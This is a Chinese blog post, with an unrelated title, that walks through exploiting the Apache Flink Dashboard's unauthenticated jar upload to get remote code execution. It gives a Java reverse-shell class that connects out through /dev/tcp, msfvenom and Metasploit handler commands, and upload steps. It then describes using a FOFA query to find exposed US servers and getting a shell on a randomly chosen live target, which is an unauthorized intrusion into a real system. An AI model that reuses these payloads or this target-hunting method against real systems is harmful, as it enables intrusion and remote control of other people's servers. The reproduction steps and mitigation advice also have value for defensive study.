poi最新jar包版本_apache flink任意jar包上传导致远程代码执行

最新推荐文章于 2022-04-30 16:09:35 发布
最新推荐文章于 2022-04-30 16:09:35 发布
阅读量124 收藏
点赞数
文章标签: poi最新jar包版本

dab4f5095ecbf499b75a9a0d59727a35.png

原创: Mature 合天智汇

原创投稿活动:重金悬赏 | 合天原创投稿等你来

漏洞描述:

2019年11月11号,安全工程师Henry Chen披露了一个Apache Flink未授权上传jar包导致远程代码执行的漏洞。由于Apache Flink Dashboard 默认无需认证即可访问,通过上传恶意jar包并触发恶意代码执行,从而获取shell。

影响范围

<= 1.9.1(最新版本)

环境搭建:

(1) 提前安装好java(需要java8以上)

8116af48c4f9c2b0ccacc218ab6f8165.png

(2) 下载flink-1.9.1

下载地址:https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

(3) 解压下载的压缩包:

tar -zxf flink-1.9.1-bin-scala_2.11.tgz

(4) 进去到解压后的目录中,来到其bin目录下:

fe010b7919e4ba63407d87c38c2460b9.png

(5) 启动flink:

./start-cluster.sh

(6) 浏览器访问验证(默认端口为8081):

http://172.26.1.108:8081

b233e84f67f609e7835e47ec5c4a358f.png

出现上图即搭建成功.

(7) 设置开机自启(这里折腾了好久,一直起不来.直接source /etc/rc.d/rc.local可以启动,但是重启后并不会启动flink,最后在一篇博客中找到了解决方法)

87942aa2d9620a303698ca166e9b5724.png

开机自启设置参考:

https://www.cnblogs.com/aaronlinux/p/6804531.html

漏洞复现:

jar包制作步骤:

(1) 参考https://klionsec.github.io/2016/09/27/revese-shell/#menu文中给出的利用java反弹shell

a90b8d38b2f1a7e5fd9fdadff0e686fc.png

记得修改ip和端口:

9d57ec76d28a001a1e883ff159c4e494.png

代码:

package shell;public class Revs {    /**    * @param args    * @throws Exception     */    public static void main(String[] args) throws Exception {        // TODO Auto-generated method stub        Runtime r = Runtime.getRuntime();        String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/192.168.1.12/9999;cat <&5 | while read line; do $line 2>&5 >&5; done"};        Process p = r.exec(cmd);        p.waitFor();    }}

(2) 利用eclipse将其导出为一个可执行的jar包: a. 点击 File-->Export(导出)

837a544274f066062d79ba7df452ed2a.png

b.然后选择java-->Runnable JAR file

0fbf373be541a4dcb7e888dc357e454c.png

c.然后选择对应的java项目和导出路径以及导出文件名

7b8352f66e24022e53cbe7b46b34b156.png

图片

这样就生成了一个反弹shell的jar包

msf生成jar马:

(1) 利用msfvenom来生成一个jar马:

msfvenom -p java/meterpreter/reverse_tcp LHOST=172.26.1.156 LPORT=9999 W >text.jar

(2) 打开msf的监听模块,并监听9999端口(要与我们jar马设置的端口一致)

use exploit/multi/handlerset payload java/meterpreter/reverse_tcpset LHOST 172.26.1.156set LPORT 9999exploit

(3) 上传我们生成的jar马并提交后(这部分操作参考下面的复现),可以看到我们成功接收到shell:

bf1f8eb927f4a160c45db527d7e9a630.png

本地复现:

(1) 访问目标:

1598f494ef28201ccae08507e325dd47.png

(2) 点击Submit New job,打开上传jar包的页面:

aac759fc0b3ec45e51c9805a801c093d.png

(3) 点击Add New选择我们制作好的jar包:

5f01922b24d14c06009766d2341367e6.png

(4) 我们的机器上监听好端口(我们制作的jar包是直接反弹shell的)

(5) 点击我们刚刚上传的jar包:

34db6b89404d5f632bc0e15e68908755.png

(6) 然后点击Submit即可,可以看到我们已经成功接收到了shell:

5831459b2192c3b190f0a623c12f8a05.png

互联网站点:

fofa关键词:

"apache-flink-dashboard" && country="US"

4a9ee9634ca7bb99e72c259dfeb8978e.png

(1) 随便找一个目标:

6849ea200d4369a78e5cb54d968d7b93.png

(2) 点击Submit new Job,可以看到其可以允许我们上传jar包

6bbc5b7b82ab62d121bc70248f7e9852.png

(3) 利用flink上传jar包的功能将我们的jar包上传:

b2f8f977705c8be95ad25610b0c57a0b.png

(4) 上传后,我们在我们的vps上监听好端口

(5) 然后回到浏览器,选中我们刚刚上传的jar包,然后点击Submitting提交,可以看到我们的vps已经成功接收到了shell

06c7b34a08dfd59b8a05d0c6a373f222.png

漏洞修复:

建议设置防火墙策略,仅允许白名单ip访问 apache flink服务,并在Web代理(如apache httpd)中增加对该服务的digest认证。

时刻关注官网,等待新版本或补丁更新

参考链接:

flink安装https://s.tencent.com/research/bsafe/841.htmlhttps://mp.weixin.qq.com/s?src=11&timestamp=1573607236&ver=1971&signature=roySoRWnz5MgPLuikntTt3rx7rWFdFBOOQfI5rmaOe-d1LWj7NEJxkVBvzfjKtpuihSaRk*EVBoHJ5Roh48qdTm3v2jbU8EWAVAs8i3ylp3OOskx7IUXnKXqDU5tcUfn&new=1https://klionsec.github.io/2016/09/27/revese-shell/#menu

声明:笔者初衷用于分享与普及网络知识,若读者因此作出任何危害网络安全行为后果自负,与合天智汇及原作者无关!

weixin_39628063
关注
解决eclipse导出的jar文件打不开问题
12-24
这里面有解决eclipse导出的jar文件打不开的详细方法。 当然,不能保证所有问题都能解决。
eclipse 64位_eclipse 软件安装教程
weixin_39645249的博客
11-22 815
安装包下载地址[软件名称]:eclipse[安装环境]:Win 10/Win 8/Win 7[eclipse32-64bit下载链接]:https://pan.baidu.com/s/1mqim58oGlW0j_3CrPybsFg[提取码]:bs16(建议复制粘贴链接与提取码)[远程安装]:联系QQ:2323962885安装中有问题可以咨询微信:XYSHY2注:若链接失效,请到群...
eclipse导出jar包无法运行,或者一闪而过的问题解决
Wulv的专栏
12-30 3123
工作中顺手写了个小工具用于抽取代码. 重装系统之后发现无法使用. 如今已经解决,遂把过程记录于此. jdk版本 : 1.7  系统版本: Win7旗舰版. eclipse : eclipse-jee-luna-SR1-win32-x86_64 一、检查环境变量 JAVA_HOME Path 不需要配置classpath.. 二、选择打开方式
Eclipse导出jar包后,jar包不能运行的解决方法
weixin_33675507的博客
02-08 1443
最近在用Eclipse写Java桌面程序,程序写到菜单部分(JMenu)的部分,其中 |帮助|菜单下有一个|关于|的菜单项,实现程序说明(弹出小窗口)的功能,窗口内部插入了一张gif,在Eclipse内部运行正常,但是导出为jar包的时候之后,既脱离Eclipse环境,就不能单独运行。选择不同的导出方式不行,网上搜索许久,没有找到合适的解决方案,安装FatJar插件导出仍然...
Eclipse导出Ruunable jar file双击不能运行 问题描述以及解决办法
qq_43510031的博客
01-01 543
问题描述(解决方法直接下拉到 "第一步"部分及以下): **写的一个坦克大战导出的Runnable Jre file 文件在桌面上双击没有反应. 在网上搜索之后 有如下描述 上文大致意思如下: 如果你安装了jre并配置成功, 我觉得它确实是那么做了(尝试运行.jar文件).但是是悄无声息的. 为了更清楚的看到这个过程中发生了什么, 请你尝试在命令行 运行你的.jar文件 运行格式: java ...
最新Apache POI 5.2.3jar包和源码
02-12
最新版本为5.2.3,这个压缩包包含了该版本jar包和源码,对于开发者来说是进行Java与Office文档交互的重要工具。 1. **Apache POI 5.2.3**: 这是Apache POI最新稳定版本,主要提供对Microsoft Office文件格式的...
org.apache.poi*jar包
01-25
在Java开发环境中,`org.apache.poi*jar包`是Apache POI项目的组成部分,包含了处理这些文件所需的类和方法。当你在导入项目时遇到`org.apache.poi*`相关的报错问题,可能的原因和解决方法有以下几点: 1. **缺失...
poi3.17版本jar包
02-04
1. **下载**:首先从Apache POI的官方网站或者通过Maven仓库下载3.17版本jar包。 2. **导入项目**:将下载的jar包添加到项目的类路径中,这可能通过IDE的“添加外部JAR”功能或者在构建路径设置中进行。 3. **依赖...
org.apache.poi jar包
06-13
org.apache.poi JAR包,解决个人的 import org.apache.commons.beanutils.PropertyUtilsBean; import org.apache.commons.lang.StringUtils; import org.apache.poi.hssf.usermodel.HSSFCell; import org.apache.poi...
poi2.rar_Apache POI_PO_apache poi2_apache poi2 API_poi.apache.c
09-24
标题中的"poi2.rar_Apache POI_PO_apache poi2_apache poi2 API_poi.apache.c"暗示了这是一个关于Apache POI的更新版本或者扩展,可能包含了一些API的更新和改进,同时也可能是对Apache POI 2版本的文档或教程。...
poi上传jar包
11-21
包含commons-fileupload-1.3.1.jar,commons-io-2.4.jar,dom4j-1.6.1.jar,junit-4.12.jar,poi-3.8-20120326.jar,poi-ooxml-3.8-20120326.jar,poi-ooxml-schemas-3.8-20120326.jar,xmlbeans-2.6.0.jar
javaPOI导入代码jar包.zip
12-27
运用java编程语言实现文件导入功能,文件上传功能所需要的jar包以及示例代码.这是用poijar包实现上传的功能!
eclipse导出的jar包不能运行
孤竹的博客
07-26 6341
在控制台下运行看报什么错: java -jar *.jar 然后修改针对错误修改
用Eclipse导出能直接运行的jar包
Tyshawn的博客
04-21 783
1,右键项目,选择Export 2,选择Runnable JAR file 3,选择入口文件 4,选择导出地址 5,OK 注意:项目里的图片必须放在src目录下,否则无法显示。src目录的地址:this.getClass().getResource()通过该方法获取。
Eclipse导出jar包
热门推荐
伟大的兔子
02-26 1万+
Eclipse导出jar包feng分为JAR file和Runnable JAE file 1. 导出Runnable JAE file 导出的jar文件可直接通过命令“jar -jar ***.jar”或双击运行 (1)项目上右键“Export”--&gt;Runnable JAE file (2) 选择入口文件(main方法所在文件), 选择导出路径,勾选“Package requ...
Eclipse导出可执行jar包
weixin_43611145的博客
05-19 830
Eclipse导出可执行jar包 1.需要导出的jar包的项目,右键->Export… 2.选择Runnable JAR file->Next 3.按照图中步骤选择 选择main方法,也就是jar包的入口方法。 选择jar包导出路径及名称。 选择引入的第三方jar包的处置方法。 3.1 Extract required libraries into generated JAR...
eclipse打的jar包无法执行,报错could not find main class
YQFCXY的博客
08-11 5685
这几天做了个小程序,并打成jar包打算在电脑上运行,结果双击打开jar时提示could not find main class等错误信息,居然提示没找到入口主函数,我了个去,然后就在网上找了一下午才解决,接下来我就讲网上的解决方案整理一下,希望对遇到同样问题的小伙伴有帮助。
flink打包运行
cobracanary的博客
04-30 5927
一个简单的flink打包运行的demo 第一步:环境准备 首先你要有个flink运行环境,我这里是使用虚拟机搭建的单机模式,启动flink,在8081端口就可以看见flink UI,在这里就可以进行flink作业的管理: 第二步:flink代码的编写 我使用flink SQL编写的代码代码很简单,使用SQL读入kafka中一个topic的消息,写入另一个kafka topic中: package com.ms.flinksql; import org.apache.flink.table.api..
Flink基础系列7-通过Web UI执行jar文件
只是甲的博客
10-15 1万+
文章目录环境准备一.准备代码1.1 maven准备1.2 Java代码准备二.打包三.通过Web UI执行jar文件3.1 上传文件 环境准备 本地Windows环境已安装Flink 1.9.0版本。 一.准备代码 1.1 maven准备 配置Flink的依赖 <dependency> <groupId>org.apache.flink</groupId> <artifactId>flink-java</artifactId&gt
poijar包版本
最新发布
08-02
最常用的POI jar包版本Apache POI,它由Apache软件基金会开发和维护。Apache POI提供了对Office文件的编程访问,可以读取、写入和修改这些文件。它提供了多个子项目,每个子项目都对应不同的Office文件格式,如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值